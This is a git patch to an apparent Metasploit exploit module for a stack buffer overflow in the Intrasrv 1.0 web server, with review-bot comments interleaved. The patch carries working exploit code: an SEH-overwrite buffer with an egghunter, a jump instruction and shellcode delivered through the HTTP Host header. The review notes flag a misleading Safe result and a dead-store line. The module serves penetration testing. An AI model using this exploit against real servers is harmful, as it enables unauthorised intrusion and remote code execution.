From a35d548979c83a69cdc9008568fb9503621018e5 Mon Sep 17 00:00:00 2001
From: Nathan Einwechter
Date: Mon, 12 Aug 2013 10:01:01 -0400
Subject: [PATCH] Use HttpClient

---
 modules/exploits/windows/http/intrasrv_bof.rb | 39 ++++++++-----------
 1 file changed, 17 insertions(+), 22 deletions(-)

diff --git a/modules/exploits/windows/http/intrasrv_bof.rb b/modules/exploits/windows/http/intrasrv_bof.rb
index 4755b59993..bfe752ae45 100644
--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
@@ -10,7 +10,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Egghunter
 
   def initialize(info={})
@@ -57,24 +57,15 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged' => false,
       'DisclosureDate' => "May 30 2013",
       'DefaultTarget' => 0))
-    register_options(
-      [
-        OptPort.new('RPORT', [true, 'The remote port', 80])
-      ], self.class)
   end
 
   def check
-    begin
-      connect
-    rescue
-      print_error("Could not connect to target!")
-      return Exploit::CheckCode::Safe
-    end
-    sock.put("GET / HTTP/1.0\r\n")
-    res = sock.get
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => "/"
+    })
 
-    if res and res =~ /intrasrv 1.0/
+    if res and res.headers['Server'] =~ /intrasrv 1.0/
       return Exploit::CheckCode::Vulnerable
     else
       return Exploit::CheckCode::Safe
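Review bot: In check, send_request_cgi returns nil when the connection fails or times out, and the new `if res and res.headers['Server'] =~ /intrasrv 1.0/` then reports Safe with no message, whereas the removed connect/rescue path at least printed an error; a probe that never reached the service is not evidence that the target is safe. Consider `return Exploit::CheckCode::Unknown unless res` before the Server-header comparison so operators can tell "unreachable" from "not vulnerable". The regex also leaves the dot unescaped; `/intrasrv 1\.0/` matches only the intended banner. The enclosing class continues outside the hunk.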
@@ -88,19 +79,23 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     # setup buffer
-    buf = rand_text_alpha(target['Offset']-128) # junk to egghunter
+    buf = rand_text(target['Offset']-128) # junk to egghunter
     buf << make_nops(8) + hunter # nopsled + egghunter at offset-128
-    buf << rand_text_alpha(target['Offset']-buf.length) # more junk to offset
+    buf << rand_text(target['Offset']-buf.length) # more junk to offset
     buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter
     buf << [target.ret].pack("V*") # seh
 
-    # attach egg tag to payload
-    shellcode = egg + egg
+    # Setup payload
+    shellcode = rand_text(1) # align payload
+    shellcode = egg + egg # attach egg tags
     shellcode << payload.encoded
 
     print_status("Sending buffer...")
-    connect
-    sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
-    disconnect
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => "/",
+      'vhost' => buf,
+      'data' => shellcode
+    })
   end
 end
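Review bot: The added line `shellcode = rand_text(1) # align payload` is a dead store: the very next line `shellcode = egg + egg # attach egg tags` reassigns the variable, so the byte the comment describes never reaches the request body and the data sent is identical to what the removed `shellcode = egg + egg` produced. Either the second line should append instead of assign, `shellcode << egg + egg`, or the rand_text line should be dropped so that the comment and the code agree. Worth settling before merge, since the comment currently documents behaviour the module does not have.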